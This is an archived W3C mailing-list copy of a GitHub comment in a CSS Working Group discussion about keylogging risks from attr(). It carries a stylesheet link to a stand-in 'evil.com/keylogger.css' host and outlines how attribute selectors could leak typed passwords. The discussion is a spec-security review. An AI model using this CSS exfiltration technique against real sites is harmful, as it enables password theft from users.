W3C home > Mailing lists > Public > public-css-archive@w3.org > February 2018

Re: [csswg-drafts] [css-values] Keylogging concerns for attr() value

From: Xidorn Quan via GitHub <sysbot+gh@w3.org>
Date: Thu, 22 Feb 2018 00:30:44 +0000
To: public-css-archive@w3.org
Message-ID: <issue_comment.created-367525977-1519259443-sysbot+gh@w3.org>
> attr() can't be used for anything nefarious today

Hmmm, if you can insert a sheet on a host you controlled, e.g. inserting `<link rel="stylesheet" href="https://evil.com/keylogger.css">`, then you can get calls purely via `background: url(attr(value))` in it. But that's probably harder in most cases, but who knows?

> But then again, we already know that allowing people to run arbitrary CSS on your site is an XSS vector. It takes a little more effort than just running arbitrary script, but there have been several reasonable POCs written over the years.

It's a bit surprised to me. I didn't think CSS could be used for XSS... Have we put anything about this in CSS spec somehow?

>  Weak password exfiltration might be reasonable, particularly since using a combination of `^=` and `$=` lets you cut the exponent in half, and using `*=` gives you the set of characters used.

It's more than that, really. If you type the password, `$=` would almost record the whole password string as you type. It has pitfalls, e.g. it cannot record repeated characters, and it wouldn't work if you use arrow keys etc. to insert character before. But yeah, it's reasonable enough to shrink the search space significantly.

-- 
GitHub Notification of comment by upsuper
Please view or discuss this issue at https://github.com/w3c/csswg-drafts/issues/2339#issuecomment-367525977 using your GitHub account
Received on Thursday, 22 February 2018 00:30:47 UTC

This archive was generated by hypermail 2.4.0 : Tuesday, 5 July 2022 06:41:24 UTC